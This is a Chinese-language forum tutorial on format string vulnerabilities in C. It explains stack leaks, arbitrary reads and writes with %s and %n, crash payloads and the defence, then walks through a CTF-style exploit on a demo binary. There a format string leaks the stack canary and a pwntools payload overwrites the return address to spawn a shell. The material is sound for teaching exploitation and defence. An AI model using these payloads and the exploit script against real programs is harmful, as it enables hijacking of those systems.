查看: 743|回复: 0

[Pwn] 格式化字符串一文入门到实战

[复制链接]
发表于 2020-12-14 21:35:50 | 显示全部楼层 |阅读模式

相关题目:


格式化字符串一文入门到实战

格式化字符串一文入门到实战
入门普及:
  简单介绍一下,这是一种利用格式字符串功能来实现信息泄漏,代码执行和实现DoS攻击的漏洞。随着平台SRC的诞生,还有安全人员越来越多,如今这些漏洞已变得罕见,当使用非恒定字符串调用格式函数时,大多数现代编译器都会生成警告,而这是此漏洞的根本原因。尽管如此,这个问题仍然值得理解学习。

格式化字符串一文入门到实战

格式化字符串一文入门到实战
那么具体什么是格式字符串?
  格式字符串是包含格式说明符的字符串。它们被用于C语言和许多其他编程语言的格式函数中。例如,以下代码示例显示了C中printf()的工作方式。根据变量名中包含的内容,该语句将输出不同的句子。
  printf(“Hello, my name is %s.”, name);
  如果变量名称包含字符串“ 连云小李”,则printf()语句将输出:
  Hello, my name is 连云小李.
  注:这里特意用汉字,因为有的编译器汉字显示编码有问题,需要特别注意修改类似Unicode和utf-8
  接着是格式化函数和参数
  除了printf() 以外,还有许多格式函数,它们使用格式字符串来产生输出。例如在C语言中,有printf(),  fprintf(),  sprintf(),  snprintf(),  printf_s(),  fprintf_s(),  sprintf_s(),  snprintf_s()等。
  而除了上面代码使用的%s外,还有许多不同的格式说明符。不同的格式说明符指示应将其替换为哪种数据类型:简单举几个例子
  %d用于带符号的十进制整数,
  %u代表十进制的无符号整数,
  %x是十六进制的无符号整数,
  %s表示数据指向字符串的指针。
  根据格式说明符规定的数据格式,格式函数检索从堆栈中请求的数据。
  printf(“A is the number %d, B is the string %s”, A, &B);
  上面的printf() 函数将尝试从堆栈中检索A的值和字符串B的地址。

格式化字符串一文入门到实战

格式化字符串一文入门到实战
那到底怎么利用格式函数呢?
  当攻击者可以直接控制输入给函数的格式字符串时,就可以利用格式函数:看下面的示例,是不是很清晰?
  printf(“If the attacker can control me, you’re in trouble.”, A, B);
  当字符串中的格式说明符数量与用于填充这些位置的函数参数(如上面的A和B)数量不匹配时,将发生此漏洞。如果攻击者提供的占位符超过了参数个数,则可以使用格式函数来读取或写入堆栈。
  这里还需要补充一点关于堆栈的说明:
  堆栈涉及到数据结构的知识,不在本文的讨论范围内,这里便仅作简单叙述。
  现在只需要记住,局部变量和函数参数存储在堆栈中。这意味着,当声明局部变量或函数参数时,它将被压入堆栈。而当调用函数时,该函数也会从堆栈中获取数据。
  我们正式开始使用格式函数尝试泄漏程序信息:
  当攻击者提供的格式说明符多于函数参数来填充其位置时,想象一下会发生什么情况?当有两个格式说明符,但只有一个函数参数提供值时,printf() 会做什么?
  printf(“A is the number %d, reading stack data: %x”, A);
  printf() 仍将尝试从堆栈中检索两个值。但是由于堆栈上只有一个实际的函数参数(A)占据了这些位置,因此另一个值将被堆栈上下一个值替换。在这种情况下,printf() 将检索堆栈中的下一个值,并以十六进制格式显示它。
  因此,攻击者只需提供以下字符串即可读取堆栈上的大量数据:
  printf(“%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x”);
  看起来乱七八糟的,可能有点像WEB渗透中的SQL攻击的效果,这句代码将在堆栈上打印接下来的20个数据
  攻击者甚至可以通过使用特殊情况格式说明符直接访问堆栈上的第i个参数:
  printf("%10$x");
  这句代码将在堆栈上打印第十个元素
  很明显,这将导致堆栈数据泄漏:包括返回地址,局部变量和其他函数的参数。
  那再升级一下,如何在内存中的任何位置读取数据呢?
  当%s用作格式说明符时,该函数会将堆栈上的数据视为要从中获取字符串的地址。这称为引用传递。这意味着即使数据不在堆栈中,攻击者也有可能使用%s从任何地址读取。
  
  但是,具体又如何控制%s访问的地址?攻击者需要在堆栈上放置一个地址,并使%s取消引用该地址!
  更简便一点的情况下,格式字符串将会完全由攻击者控制存储在堆栈中!因此,如果攻击者可以将地址植入格式字符串中并让%s取消引用,则甚至可以访问堆栈之外的数据。
  printf(“\xef\xbe\xad\xde%x%x%x%s”, A, B, C);
  例如,上面的代码将导致printf() 打印位于地址0xdeadbeef的字符串。%x系列用于将堆栈遍历到格式字符串的位置,所需的%x数量会因情况而异。%s告诉printf() 处理的前四个字节的格式字符串作为指针指向打印的字符串。

格式化字符串一文入门到实战

格式化字符串一文入门到实战
  因为堆栈向下增长,并将函数参数逐一压入堆栈。然后,printf() 返回堆栈以检索参数值。
  通过提供额外的%s,攻击者强制printf() 从堆栈中访问另一个值,并将其视为指向字符串的4字节指针。
  因此printf() 打印出位于0xdeadbeef的字符串,该字符串是由格式字符串的前四个字节指定的地址。
  继续讲述在任何位置覆盖内存:
  在printf() 中,%n是一种特殊情况的格式说明符。%n不会被函数参数替换,而是将到目前为止写入的字符数存储到相应的函数参数中。
  例如,以下代码将整数5存储到变量num_char中
  int num_char;
  printf(“11111%n”, &num_char);
  有了伪输出字符和宽度控制格式说明符,攻击者现在可以将任意整数写入函数参数所指向的位置。
  下面是一个宽度控制格式说明符的示例,该说明符将帮助攻击者避免使用非常长的漏洞利用字符串,并允许攻击者访问任意位置,即使缓冲区不足以容纳所需的填充字符数也是如此。
  int num_char;
  printf(“%10d%n”, 0, &num_char);
  代码将显示 "          0",num_char为10
  而且,通过使用长度修饰符,攻击者可以通过精确度来控制写入的数据量。例如,%n会将4个字节写入目标地址,而%hn只会写入2个字节。
  printf(“%10d%n”, 0, &num_char);
  将4个字节写入&num_char
  printf(“%10d%hn”, 0, &num_char);
  将2个字节写入&num_char
  使用这些攻击艺术,攻击者可以写入任意内存位置。这可以使攻击者覆盖返回地址,函数指针,全局偏移量表(GOT)和析构函数表(DTORS),从而劫持程序流并执行任意代码。
  不仅如此,攻击者甚至可以使用格式函数导致程序崩溃
  由于%s的函数参数是通过引用传递的,因此对于格式字符串中的每个%s,该函数将从堆栈中检索一个值,将该值视为地址,然后打印出存储在该地址的字符串。
  但是堆栈上的值并不总是一个地址。它们可以是整数,字符或任何其他类型的数据。这意味着如果攻击者强制该函数将堆栈数据解释为一个地址,则该程序可能会遇到无效的地址并崩溃。
  注:这可能是一个不存在的地址,或者位于受保护的地址空间,如内核空间中。
  该漏洞利用字符串如下所示:
  printf (“%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s”);
  
  格式字符串中的%s越多,遇到无效地址的几率就越高。
  我们再讲讲防止格式字符串攻击:
  尽管现在针对二进制漏洞利用的对策(例如地址随机化)有助于使利用格式字符串漏洞变得更加困难,但防止此类漏洞发生的可靠方法是正确实现格式函数,从代码源头防御。
  使用格式函数时,重要的是避免直接将用户输入用作格式字符串。而是将用户输入作为替换格式说明符的函数参数传递。
  简而言之,用户输入应放在此处:
  printf(“string: %s”, USER_INPUT);
  而不是这里:
  printf(USER_INPUT, A, B);
  作为一种额外的更保险的安全措施,还应该始终对用户输入进行清理并检测清除危险字符。

格式化字符串一文入门到实战

格式化字符串一文入门到实战
案例提升:
  原理讲完了,我们来“搞一波事情”:
  假设当我们拿到了对方一个二进制文件demo,并开启了canary保护,我们开始分析该文件,并绕过该保护。
  
  当对方开启canary保护时,系统会在函数开始前先想栈中插入一个cookie,当函数结束,栈帧销毁前会检测栈中cookie值是否被改变。
  为了更好理解,我们通过观察x86架构的局部栈帧结构来理解canary保护。

格式化字符串一文入门到实战

格式化字符串一文入门到实战
  当开启canary后,在函数的开头部分会取fs/gs寄存器0x28/0x14处的值存放在$ebp-0x8的位置,这便是插入cookie值。
  
  而在函数结束后,会进行异或比较判断cookie值是否发生改变。具体实现命令如下:
  //插入cookie的值
  mov  rax, qword ptr fs : [0x28]
  mov  qword ptr[rbp - 8], rax
  //xor比较cookie值是否改变
  mov  rdx, QWORD PTR[rbp - 0x8]
  xor rdx, QWORD PTR fs : 0x28
  je    0x4005d7 < main + 65 >
  call  0x400460 < [email protected] >
  如下图,为某函数开始前插入cookie时的操作,
  首先在p/x $eax 序言部分查看canary的值,这个canary值会随着每次程序运行进行动态改变。

格式化字符串一文入门到实战

格式化字符串一文入门到实战
那么如何绕过该保护呢?
  我们利用前置知识提到过的字符串格式化漏洞,可以输出canary并利用溢出覆盖canary从而达到绕过。
  首先先编译一下给出的demo

格式化字符串一文入门到实战

格式化字符串一文入门到实战
  上文我们已经了解到Canary 设计为以字节 \x00 结尾,本意是为了保证 Canary 可以截断字符串。泄露栈中的 Canary 的思路是覆盖 Canary 的低字节,来打印出剩余的 Canary 部分。
  gdb canary.exe 进行程序调试,输入r进行运行程序,接着输入S将会进入vuln函数。

格式化字符串一文入门到实战

格式化字符串一文入门到实战
  disass vuln函数的反汇编,观察程序执行前后的操作。具体反汇编如下图:

格式化字符串一文入门到实战

格式化字符串一文入门到实战
  分析下上图,在函数序言部分插入canary值:
  0x080485fc <+6>:    mov  eax,gs:0x14
  0x08048602 <+12>:  mov  DWORD PTR [ebp-0xc],eax
  函数返回前,vuln函数返回前检测是否栈溢出
  0x08048640 <+74>:  mov  eax,DWORD PTR [ebp-0xc]
  0x08048643 <+77>:  xor  eax,DWORD PTR gs:0x14
  0x0804864a <+84>:  je    0x8048651 <vuln+91>
  0x0804864c <+86>:  call  0x8048450 <[email protected]>
  目前我们绕过思路如下:
  1.首先借用第一个read和printtf泄露出Canary的值
  2.利用第二个read进行覆盖:padding——canary——函数返回值。
  payload = "%15$08x"
  #P1:接受回显,并取出canary的值
  p.sendline(payload)
  ret = p.recv()
  #去掉换行符
  canary = ret[:8]
  print "canary is"+canary
  #P2:利用第二个read进行ROP
  offset_canary = 0xffffd64c - 0xffffd62c
  payload = 'a' * offset_canary #将栈覆盖到canary之前
  payload += (canary.decode("hex"))[::-1] #写入canary
  payload += 'b' * (2*4+4) #padding空+ebp
  payload += p32(shell_addr) #用后门函数覆盖ret
  
  p.sendline(payload)
  p.interactive()
  
  运行一下,成功执行了exploit函数,从而getshell。
  知识总结:
  最后总结一下:
  一般攻击者在进行栈溢出攻击时,是通过覆盖函数结束时ret的返回值所需的eip来进行程序的控制,而cookie值在ret返回地址return address的栈空间上面,因此当攻击者覆盖了return address时同时也会覆盖掉cookie值,这样在函数结束会检测出cookie值发生了改变,导致检测失败,程序中断,避免了程序被攻击者利用。这个cookie值即是canary value。
  如果使用不当,看似无害的格式函数可能会成为漏洞的主要来源。除C之外,许多其他编程语言都有其自己的格式函数,在使用它们输出数据之前,建议检查这些函数用法,并特别注意可能的安全隐患,避免漏洞发生。
通知!



温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046
微信扫一扫即可使用手机论坛
快速回复 返回顶部 返回列表